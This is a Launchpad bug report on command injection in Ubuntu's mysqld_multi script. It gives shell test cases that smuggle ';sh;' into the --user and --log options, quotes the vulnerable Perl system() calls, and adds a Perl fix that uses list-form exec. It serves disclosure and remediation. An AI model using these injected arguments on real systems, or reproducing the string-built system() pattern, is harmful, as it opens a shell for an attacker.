Public bug reported:

Binary package hint: mysql-server-5.1

/usr/bin/mysqld_multi has command injection bugs.

Test case:

emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --example --silent > /tmp/mysqld_multi_example

1) report option:

emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --user="User ping;sh;" report --silent
mysqld_multi log file version 2.16; run: Fri May 13 19:41:26 2011
Reporting MySQL servers
/usr/bin/mysqladmin: connect to server at 'localhost' failed
error: 'Access denied for user 'User'@'localhost' (using password: NO)'
$

2) start option:

emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --log="/tmp/mlog;echo SystemInj;sh;echo 1" start
SystemInj
$

3) stop option:

emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --user="User ping;sh;" stop --silent
mysqld_multi log file version 2.16; run: Fri May 13 19:42:59 2011
Stopping MySQL servers
/usr/bin/mysqladmin: connect to server at 'localhost' failed
error: 'Access denied for user 'User'@'localhost' (using password: NO)'
$

The bug can be found at:

1) sub report_mysqlds

    $com= get_mysqladmin_options($i, @groups);
    $com.= " ping >> /dev/null 2>&1";
    system($com);

2) sub start_mysqlds()

    $com.= $tmp;
    $com.= " >> $opt_log 2>&1" if (!$opt_no_log);
    $com.= " &";
    system($com);

3) sub stop_mysqlds()

    $com= get_mysqladmin_options($i, @groups);
    $com.= " shutdown";
    $com.= " >> $opt_log 2>&1" if (!$opt_no_log);
    $com.= " &";
    system($com);

** Affects: mysql-5.1 (Ubuntu)
     Importance: Undecided
         Status: New

https://bugs.launchpad.net/bugs/782298

Title:
  command injections in mysqld_multi
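
Added example, not part of the original report and not mysqld_multi's own code: the three system($com) calls quoted above hand a concatenated string to /bin/sh, so one way to close the hole is to pass an argument list and open the log file from Perl instead of using shell redirection. run_logged is a hypothetical helper, perl itself stands in for mysqladmin so the code runs without a MySQL install, and the --user and --log values are the ones from the test cases.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);

# Hypothetical helper (not from mysqld_multi): run a command with its output
# appended to $log, without ever handing a string to /bin/sh.
sub run_logged {
    my ($log, @argv) = @_;
    defined(my $pid = fork()) or die "fork: $!";
    if ($pid == 0) {
        # Child: 3-arg open treats $log purely as a file name, so a ';'
        # inside it is just another character of that name.
        open(STDOUT, '>>', $log)     or die "open $log: $!";
        open(STDERR, '>&', \*STDOUT) or die "dup stderr: $!";
        # Indirect-object exec always uses the list form, never a shell.
        exec { $argv[0] } @argv or die "exec $argv[0]: $!";
    }
    # mysqld_multi backgrounds its children with '&'; a caller wanting that
    # behaviour would skip this wait.
    waitpid($pid, 0);
    return $? >> 8;
}

# Demo values taken from the report's test cases; the log lives in a
# scratch directory that is removed on exit.
my $dir  = tempdir(CLEANUP => 1);
my $user = 'User ping;sh;';
my $log  = "$dir/mlog;echo SystemInj;sh;echo 1";

# Stand-in for mysqladmin (assumption): perl printing each argument it gets.
my @cmd = ($^X, '-e', 'print "[$_]\n" for @ARGV', "--user=$user", 'ping');
my $rc  = run_logged($log, @cmd);

# Show what the child actually received: the whole --user value arrives as
# one literal argument, and the log name is used verbatim.
open(my $fh, '<', $log) or die "read $log: $!";
print "exit=$rc\n", <$fh>;
close($fh);
```

Applying this to mysqld_multi would also require get_mysqladmin_options to return a list of arguments rather than a single string, which is an assumption about how the fix would be structured.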